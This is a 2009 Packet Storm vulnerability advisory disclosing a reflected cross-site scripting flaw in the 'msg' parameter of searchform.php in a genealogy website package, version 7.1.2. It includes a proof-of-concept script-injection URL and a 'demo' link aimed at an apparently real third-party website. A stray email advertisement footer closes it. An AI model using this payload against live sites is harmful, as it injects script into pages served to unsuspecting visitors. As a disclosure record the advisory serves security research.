The Next Generation Of Genealogy Sitebuilding XSS

2009-12-13T00:00:00
ID PACKETSTORM:83745
Type packetstorm
Reporter bi0
Modified 2009-12-13T00:00:00

Description

                                        
                                            `  
  
  
______ __ ______   
/\ == \ /\ \ /\ __ \   
\ \ __< \ \ \ \ \ \/\ \   
\ \_____\ \ \_\ \ \_____\   
\/_____/ \/_/ \/_____/   
  
  
[#]----------------------------------------------------------------[#]  
#   
# [x] Target: The Next Generation of Genealogy Sitebuilding [XSS]  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com   
# [x] Download: http://lythgoes.net/genealogy/software.php  
# [x] Version: 7.1.2  
# [x] Price: $29.99 USD  
# [x] Thanks: packetdeath  
#   
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :   
#   
# http://localhost/searchform.php?msg=[XSS]  
#  
# [x] Poc :   
#   
# http://localhost/searchform.php?msg=searchform.php?msg="/><script>alert('XSS')</script>  
#   
[#]------------------------------------------------------------------------------------------[#]  
#  
# Demo :   
#   
# [+] http://horwitzfam.org/searchform.php?msg="/><script>alert('XSS')</script>  
#   
#   
[#]-------------------------------------------------------------------------------------------[#]  
  
#EOF  
  
_________________________________________________________________  
Windows Live: Friends get your Flickr, Yelp, and Digg updates when they e-mail you.  
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_3:092010`